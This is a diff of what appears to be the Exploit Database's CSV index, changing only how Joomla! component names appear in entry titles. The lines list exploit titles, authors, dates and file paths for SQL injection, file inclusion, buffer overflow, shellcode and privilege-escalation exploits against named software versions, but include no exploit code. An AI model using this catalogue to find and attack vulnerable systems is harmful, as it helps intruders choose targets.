-17556,platforms/php/webapps/17556.txt,"Joomla! Component JE K2 Story Submit - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
+17556,platforms/php/webapps/17556.txt,"Joomla! Component 'com_jesubmit' - Local File Inclusion",2011-07-21,v3n0m,php,webapps,0
 17557,platforms/windows/remote/17557.html,"Dell IT Assistant - detectIESettingsForITA.ocx ActiveX Control",2011-07-21,rgod,windows,remote,0
 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - egghunt Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
-17560,platforms/php/webapps/17560.txt,"Joomla! Component mod_spo - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
+17560,platforms/php/webapps/17560.txt,"Joomla! Component 'mod_spo' - SQL Injection",2011-07-21,SeguridadBlanca,php,webapps,0
 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Local Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0
 17562,platforms/php/webapps/17562.php,"ExtCalendar2 - (Authentication Bypass/Cookie) SQL Injection",2011-07-23,Lagripe-Dz,php,webapps,0
 17563,platforms/windows/local/17563.py,"Download Accelerator plus (DAP) 9.7 - M3U File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0
@@ -15284,7 +15284,7 @@ id,file,description,date,author,platform,type,port
 17575,platforms/windows/remote/17575.txt,"Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass)",2011-07-26,Abysssec,windows,remote,0
 17577,platforms/cgi/webapps/17577.txt,"SWAT Samba Web Administration Tool - Cross-Site Request Forgery (PoC)",2011-07-27,"Narendra Shinde",cgi,webapps,0
 17578,platforms/windows/remote/17578.txt,"MinaliC WebServer 2.0 - Remote Source Disclosure",2011-07-27,X-h4ck,windows,remote,0
-17579,platforms/php/webapps/17579.rb,"Joomla! Component com_virtuemart 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
+17579,platforms/php/webapps/17579.rb,"Joomla! Component 'com_virtuemart' 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)",2011-07-28,TecR0c,php,webapps,0
 17580,platforms/windows/dos/17580.py,"MyWebServer 1.0.3 - Denial of Service",2011-07-28,X-h4ck,windows,dos,0
 17581,platforms/windows/remote/17581.txt,"MyWebServer 1.0.3 - Arbitrary File Download",2011-07-28,X-h4ck,windows,remote,0
 17582,platforms/windows/dos/17582.txt,"Citrix XenApp / XenDesktop - Stack Based Buffer Overflow",2011-07-28,"n.runs AG",windows,dos,0
@@ -15294,7 +15294,7 @@ id,file,description,date,author,platform,type,port
 17587,platforms/php/webapps/17587.txt,"Link Station Pro - Multiple Vulnerabilities",2011-07-30,"$#4d0\/\/[r007k17]",php,webapps,0
 17588,platforms/windows/remote/17588.rb,"Actfax FTP Server 4.27 - USER Command Stack Buffer Overflow (Metasploit)",2011-07-31,mr_me,windows,remote,0
 17590,platforms/php/webapps/17590.txt,"Digital Scribe 1.5 - (register_form()) Multiple POST Cross-Site Scripting Vulnerabilities",2011-07-31,LiquidWorm,php,webapps,0
-17591,platforms/php/webapps/17591.txt,"Joomla! Component com_obSuggest - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
+17591,platforms/php/webapps/17591.txt,"Joomla! Component 'com_obSuggest' - Local File Inclusion",2011-07-31,v3n0m,php,webapps,0
 17592,platforms/php/webapps/17592.txt,"CMSPro! 2.08 - Cross-Site Request Forgery",2011-08-01,Xadpritox,php,webapps,0
 17593,platforms/php/webapps/17593.txt,"ZoneMinder 1.24.3 - Remote File Inclusion",2011-08-01,iye,php,webapps,0
 17595,platforms/php/webapps/17595.txt,"MyBB MyTabs Plugin - SQL Injection",2011-08-02,"AutoRUN and dR.sqL",php,webapps,0
@@ -15303,7 +15303,7 @@ id,file,description,date,author,platform,type,port
 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0
 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",windows,dos,0
 17602,platforms/php/webapps/17602.txt,"WordPress Plugin TimThumb 1.32 - Remote Code Execution",2011-08-03,MaXe,php,webapps,0
-17603,platforms/php/webapps/17603.txt,"Joomla! Component com_jdirectory - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
+17603,platforms/php/webapps/17603.txt,"Joomla! Component 'com_jdirectory' - SQL Injection",2011-08-03,"Caddy Dz",php,webapps,0
 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
 17605,platforms/windows/local/17605.rb,"ABBS Electronic Flashcards 2.1 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0
 17606,platforms/multiple/webapps/17606.txt,"DZYGroup CMS Portal - Multiple SQL Injections",2011-08-04,Netrondoank,multiple,webapps,0
@@ -15337,7 +15337,7 @@ id,file,description,date,author,platform,type,port
 17643,platforms/windows/dos/17643.pl,"Excel - SLYK Format Parsing Buffer Overrun (PoC)",2011-08-09,webDEViL,windows,dos,0
 17644,platforms/php/webapps/17644.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (2)",2011-08-09,pentesters.ir,php,webapps,0
 17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
-17646,platforms/php/webapps/17646.txt,"Joomla! Component TNR Enhanced Joomla! Search - SQL Injection",2011-08-09,NoGe,php,webapps,0
+17646,platforms/php/webapps/17646.txt,"Joomla! Component 'com_esearch' - SQL Injection",2011-08-09,NoGe,php,webapps,0
 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0
 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0
 17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
@@ -15358,7 +15358,7 @@ id,file,description,date,author,platform,type,port
 17669,platforms/windows/remote/17669.py,"Simple HTTPd 1.42 - PUT Request Remote Buffer Overflow",2011-08-15,nion,windows,remote,0
 17672,platforms/windows/remote/17672.html,"Mozilla Firefox 3.6.16 - mChannel Object Use-After-Free Exploit (Windows 7)",2011-08-16,mr_me,windows,remote,0
 17673,platforms/php/webapps/17673.txt,"WordPress Plugin IP-Logger 3.0 - SQL Injection",2011-08-16,"Miroslav Stampar",php,webapps,0
-17674,platforms/php/webapps/17674.txt,"Joomla! Component JoomTouch - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
+17674,platforms/php/webapps/17674.txt,"Joomla! Component 'com_joomtouch' - Local File Inclusion",2011-08-17,NoGe,php,webapps,0
 17675,platforms/php/webapps/17675.txt,"SoftwareDEP Classified Script 2.5 - SQL Injection",2011-08-17,v3n0m,php,webapps,0
 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,windows,dos,0
 17677,platforms/php/webapps/17677.txt,"WordPress Plugin File Groups 1.1.2 - SQL Injection",2011-08-17,"Miroslav Stampar",php,webapps,0
@@ -15412,9 +15412,9 @@ id,file,description,date,author,platform,type,port
 17731,platforms/php/webapps/17731.txt,"WordPress Plugin Photoracer 1.0 - Multiple Vulnerabilities",2011-08-27,"Yakir Wizman",php,webapps,0
 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",windows,local,0
 17733,platforms/asp/webapps/17733.txt,"Ferdows CMS Pro 1.1.0 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",asp,webapps,0
-17734,platforms/php/webapps/17734.txt,"Joomla! Extension JCE 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0
+17734,platforms/php/webapps/17734.txt,"Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities",2011-08-28,"AmnPardaz ",php,webapps,0
 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0
-17736,platforms/php/webapps/17736.txt,"Joomla! Component simple file lister module 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
+17736,platforms/php/webapps/17736.txt,"Joomla! Component 'mod_simpleFileLister' 1.0 - Directory Traversal",2011-08-28,evilsocket,php,webapps,0
 17737,platforms/php/webapps/17737.txt,"WordPress Plugin Facebook Promotions 1.3.3 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
 17738,platforms/php/webapps/17738.txt,"WordPress Plugin Evarisk 5.1.3.6 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
 17739,platforms/php/webapps/17739.txt,"WordPress Plugin Profiles 2.0 RC1 - SQL Injection",2011-08-28,"Miroslav Stampar",php,webapps,0
@@ -15587,7 +15587,7 @@ id,file,description,date,author,platform,type,port
 17931,platforms/windows/dos/17931.txt,"genstat 14.1.0.5943 - Multiple Vulnerabilities",2011-10-04,"Luigi Auriemma",windows,dos,0
 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 <= 0.101 - Linux Privilege Escalation",2011-10-05,zx2c4,linux,local,0
 17933,platforms/windows/dos/17933.html,"DivX Plus Web Player - 'file://' Buffer Overflow (PoC)",2011-10-05,Snake,windows,dos,0
-18033,platforms/php/webapps/18033.txt,"Joomla! Component YJ Contact us - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
+18033,platforms/php/webapps/18033.txt,"Joomla! Component 'com_yjcontactus' - Local File Inclusion",2011-10-25,MeGo,php,webapps,0
 17935,platforms/php/webapps/17935.txt,"tsmim Lessons Library - 'show.php' SQL Injection",2011-10-06,M.Jock3R,php,webapps,0
 17936,platforms/windows/remote/17936.rb,"Opera 10/11 - (bad nesting with frameset tag) Memory Corruption (Metasploit)",2011-10-06,"Jose A. Vazquez",windows,remote,0
 17937,platforms/php/webapps/17937.txt,"URL Shortener Script 1.0 - SQL Injection",2011-10-07,M.Jock3R,php,webapps,0
@@ -15597,7 +15597,7 @@ id,file,description,date,author,platform,type,port
 17941,platforms/linux/webapps/17941.rb,"Spreecommerce 0.60.1 - Arbitrary Command Execution (Metasploit)",2011-10-07,Metasploit,linux,webapps,0
 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0
 17943,platforms/php/webapps/17943.txt,"BOOKSolved 1.2.2 - Remote File Disclosure",2011-10-08,bd0rk,php,webapps,0
-17944,platforms/php/webapps/17944.txt,"Joomla! Component Time Returns (com_timereturns) 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0
+17944,platforms/php/webapps/17944.txt,"Joomla! Component 'com_timereturns' 2.0 - SQL Injection",2011-10-08,kaMtiEz,php,webapps,0
 17946,platforms/php/webapps/17946.txt,"NexusPHP 1.5 - SQL Injection",2011-10-08,flyh4t,php,webapps,0
 17947,platforms/php/webapps/17947.rb,"Snortreport - nmap.php and nbtscan.php Remote Command Execution (Metasploit)",2011-10-09,Metasploit,php,webapps,0
 17948,platforms/windows/remote/17948.rb,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)",2011-10-09,Metasploit,windows,remote,0
@@ -15669,7 +15669,7 @@ id,file,description,date,author,platform,type,port
 18023,platforms/php/dos/18023.java,"phpLDAPadmin 0.9.4b - Denial of Service",2011-10-23,Alguien,php,dos,0
 18024,platforms/windows/dos/18024.txt,"Win32k - Null Pointer De-reference PoC (MS11-077)",2011-10-23,KiDebug,windows,dos,0
 18025,platforms/multiple/dos/18025.txt,"Google Chrome - Denial of Service",2011-10-23,"Prashant Uniyal",multiple,dos,0
-18042,platforms/php/webapps/18042.txt,"Joomla! Component Techfolio 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
+18042,platforms/php/webapps/18042.txt,"Joomla! Component 'com_techfolio' 1.0 - SQL Injection",2011-10-28,"Chris Russell",php,webapps,0
 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 (build 237) - Denial of Service (PoC)",2011-10-28,loneferret,windows,dos,0
 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80
 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
@@ -15686,17 +15686,17 @@ id,file,description,date,author,platform,type,port
 18038,platforms/windows/local/18038.rb,"GTA SA-MP server.cfg - Buffer Overflow (Metasploit)",2011-10-26,Metasploit,windows,local,0
 18039,platforms/php/webapps/18039.txt,"WordPress Plugin wptouch - SQL Injection",2011-10-27,longrifle0x,php,webapps,0
 18045,platforms/php/webapps/18045.txt,"PHP Photo Album 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0
-18047,platforms/php/webapps/18047.txt,"Joomla! Component JEEMA Sms 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
-18048,platforms/php/webapps/18048.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
+18047,platforms/php/webapps/18047.txt,"Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
+18048,platforms/php/webapps/18048.txt,"Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0
-18050,platforms/php/webapps/18050.txt,"Joomla! Component HM-Community com_hmcommunity - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
+18050,platforms/php/webapps/18050.txt,"Joomla! Component 'com_hmcommunity' - Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0
 18051,platforms/windows/remote/18051.txt,"BroadWin Webaccess SCADA/HMI Client - Remote Code Execution",2011-10-31,Snake,windows,remote,0
 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0
 18053,platforms/php/webapps/18053.txt,"WordPress Theme classipress 3.1.4 - Persistent Cross-Site Scripting",2011-10-31,"Paul Loftness",php,webapps,0
 18055,platforms/php/webapps/18055.txt,"WordPress Plugin Glossary - SQL Injection",2011-10-31,longrifle0x,php,webapps,0
 18056,platforms/php/webapps/18056.txt,"jbShop - e107 7 CMS Plugin - SQL Injection",2011-10-31,"Robert Cooper",php,webapps,0
 18057,platforms/windows/remote/18057.rb,"NJStar Communicator 3.00 - MiniSMTP Server Remote Exploit (Metasploit)",2011-10-31,"Dillon Beresford",windows,remote,0
-18058,platforms/php/webapps/18058.txt,"Joomla! Component Alameda (com_alameda) 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
+18058,platforms/php/webapps/18058.txt,"Joomla! Component 'com_alameda' 1.0 - SQL Injection",2011-10-31,kaMtiEz,php,webapps,0
 18061,platforms/hardware/webapps/18061.txt,"ZTE ZXDSL 831IIV7.5.0a_Z29_OV - Multiple Vulnerabilities",2011-11-01,"mehdi boukazoula",hardware,webapps,0
 18062,platforms/windows/remote/18062.txt,"Oracle Hyperion Financial Management TList6 - ActiveX Control Remote Code Execution",2011-11-02,rgod,windows,remote,0
 18063,platforms/php/webapps/18063.txt,"BST - BestShopPro (nowosci.php) Multiple Vulnerabilities",2011-11-02,CoBRa_21,php,webapps,0
@@ -15800,7 +15800,7 @@ id,file,description,date,author,platform,type,port
 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0
 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",windows,remote,0
 18190,platforms/windows/remote/18190.rb,"RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit)",2011-12-02,Metasploit,windows,remote,0
-18192,platforms/php/webapps/18192.txt,"Joomla! Component Jobprofile (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0
+18192,platforms/php/webapps/18192.txt,"Joomla! Component 'com_jobprofile' - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0
 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0
 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,windows,dos,0
 18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)",2011-12-03,Metasploit,windows,local,0
@@ -15814,7 +15814,7 @@ id,file,description,date,author,platform,type,port
 18208,platforms/php/webapps/18208.rb,"Family Connections CMS - 'less.php' Remote Command Execution (Metasploit)",2011-12-07,Metasploit,php,webapps,0
 18215,platforms/php/webapps/18215.txt,"SourceBans 1.4.8 - SQL Injection / Local File Inclusion Injection",2011-12-07,Havok,php,webapps,0
 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0
-18218,platforms/php/webapps/18218.txt,"Joomla! Component QContacts 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0
+18218,platforms/php/webapps/18218.txt,"Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection",2011-12-08,Don,php,webapps,0
 18210,platforms/php/webapps/18210.txt,"PHP City Portal Script Software - SQL Injection",2011-12-07,Don,php,webapps,0
 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin - SQL Injection",2011-12-07,CrazyMouse,php,webapps,0
 18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,php,webapps,0
@@ -15842,7 +15842,7 @@ id,file,description,date,author,platform,type,port
 18248,platforms/php/webapps/18248.pl,"mPDF 5.3 - File Disclosure",2011-12-16,ZadYree,php,webapps,0
 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0
 18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0
-18251,platforms/php/webapps/18251.txt,"Joomla! Component com_dshop - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0
+18251,platforms/php/webapps/18251.txt,"Joomla! Component 'com_dshop' - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0
 18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0
 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0
 18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0
@@ -15938,7 +15938,7 @@ id,file,description,date,author,platform,type,port
 18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)",2012-01-17,Metasploit,osx,remote,0
 18378,platforms/linux/dos/18378.c,"Linux 2.6.36 IGMP - Remote Denial of Service",2012-01-17,kingcope,linux,dos,0
 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code Shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0
-18380,platforms/php/webapps/18380.txt,"Joomla! Component Discussions (com_discussions) - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0
+18380,platforms/php/webapps/18380.txt,"Joomla! Component 'com_discussions' - SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0
 18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection (Metasploit)",2012-06-03,Metasploit,php,webapps,0
 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0
 18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care - XMLCacheMgr Class ActiveX Control Remote Code Execution (Metasploit)",2012-01-18,Metasploit,windows,remote,0
@@ -16221,8 +16221,8 @@ id,file,description,date,author,platform,type,port
 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0
 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0
 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow (Metasploit)",2012-04-10,Metasploit,windows,remote,0
-18728,platforms/php/webapps/18728.txt,"Joomla! Component The Estate Agent (com_estateagent) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
-18729,platforms/php/webapps/18729.txt,"Joomla! Component com_bearleague - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
+18728,platforms/php/webapps/18728.txt,"Joomla! Component 'com_estateagent' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
+18729,platforms/php/webapps/18729.txt,"Joomla! Component 'com_bearleague' - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0
 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0
 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0
 18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",hardware,dos,0
@@ -16232,7 +16232,7 @@ id,file,description,date,author,platform,type,port
 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0
 18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0
 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0
-18741,platforms/php/webapps/18741.txt,"Joomla! Component com_ponygallery - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
+18741,platforms/php/webapps/18741.txt,"Joomla! Component 'com_ponygallery' - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0
 18742,platforms/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,php,webapps,0
 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0
 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0
@@ -31073,7 +31073,7 @@ id,file,description,date,author,platform,type,port
 34390,platforms/php/remote/34390.rb,"HybridAuth - install.php PHP Code Execution (Metasploit)",2014-08-21,Metasploit,php,remote,80
 34391,platforms/php/webapps/34391.txt,"Sourcefabric Campsite - Multiple Cross-Site Scripting Vulnerabilities",2010-07-30,"High-Tech Bridge SA",php,webapps,0
 34392,platforms/php/webapps/34392.txt,"MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps,0
-34393,platforms/php/webapps/34393.txt,"Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
+34393,platforms/php/webapps/34393.txt,"Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0
 34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0
 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0
 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0
@@ -31148,9 +31148,9 @@ id,file,description,date,author,platform,type,port
 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
 34473,platforms/php/webapps/34473.txt,"Property Watch - email.php videoid Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
 34474,platforms/php/webapps/34474.txt,"Property Watch - 'login.php' redirect Parameter Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0
-34475,platforms/php/webapps/34475.txt,"Joomla! Component com_weblinks - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
+34475,platforms/php/webapps/34475.txt,"Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
 34476,platforms/php/webapps/34476.txt,"Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities",2010-08-15,10n1z3d,php,webapps,0
-34477,platforms/php/webapps/34477.txt,"Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
+34477,platforms/php/webapps/34477.txt,"Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection",2010-08-15,"ViRuS Qalaa",php,webapps,0
 34478,platforms/windows/remote/34478.html,"Microsoft Internet Explorer 8 - 'toStaticHTML()' HTML Sanitization Bypass",2010-08-16,"Mario Heiderich",windows,remote,0
 34479,platforms/php/webapps/34479.html,"CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery",2010-08-16,"High-Tech Bridge SA",php,webapps,0
 34480,platforms/windows/dos/34480.py,"Xilisoft Video Converter 3.1.8.0720b - '.ogg' Buffer Overflow",2010-08-16,"Praveen Darshanam",windows,dos,0
@@ -31158,7 +31158,7 @@ id,file,description,date,author,platform,type,port
 40339,platforms/linux/remote/40339.py,"glibc - getaddrinfo Stack Based Buffer Overflow (2)",2016-09-06,SpeeDr00t,linux,remote,0
 34482,platforms/php/webapps/34482.txt,"TurnkeyForms Yahoo Answers Clone - 'questiondetail.php' Cross-Site Scripting",2009-08-10,Moudi,php,webapps,0
 34483,platforms/php/webapps/34483.txt,"Nasim Guest Book - 'page' Parameter Cross-Site Scripting",2010-08-10,Moudi,php,webapps,0
-34484,platforms/php/webapps/34484.txt,"Joomla! Component com_dirfrm - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
+34484,platforms/php/webapps/34484.txt,"Joomla! Component 'com_dirfrm' - Multiple SQL Injections",2010-08-18,Hieuneo,php,webapps,0
 34485,platforms/php/webapps/34485.txt,"FreeSchool - 'key_words' Parameter Cross-Site Scripting",2009-10-14,"drunken danish rednecks",php,webapps,0
 34486,platforms/php/webapps/34486.txt,"phpCMS 2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0
 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0
@@ -31194,7 +31194,7 @@ id,file,description,date,author,platform,type,port
 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0
 34637,platforms/php/webapps/34637.txt,"Joomla! Component 'com_formmaker' 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0
 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0
-34684,platforms/php/webapps/34684.pl,"Joomla! Component Spain - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0
+34684,platforms/php/webapps/34684.pl,"Joomla! Component 'com_spain' - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0
 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0
 34531,platforms/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",php,webapps,0
 34533,platforms/php/webapps/34533.txt,"Auto CMS 1.6 - 'autocms.php' Cross-Site Scripting",2010-08-23,"High-Tech Bridge SA",php,webapps,0
@@ -31354,7 +31354,7 @@ id,file,description,date,author,platform,type,port
 34705,platforms/php/webapps/34705.txt,"APBook 1.3 - Admin Login Multiple SQL Injection",2009-07-21,n3w7u,php,webapps,0
 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0
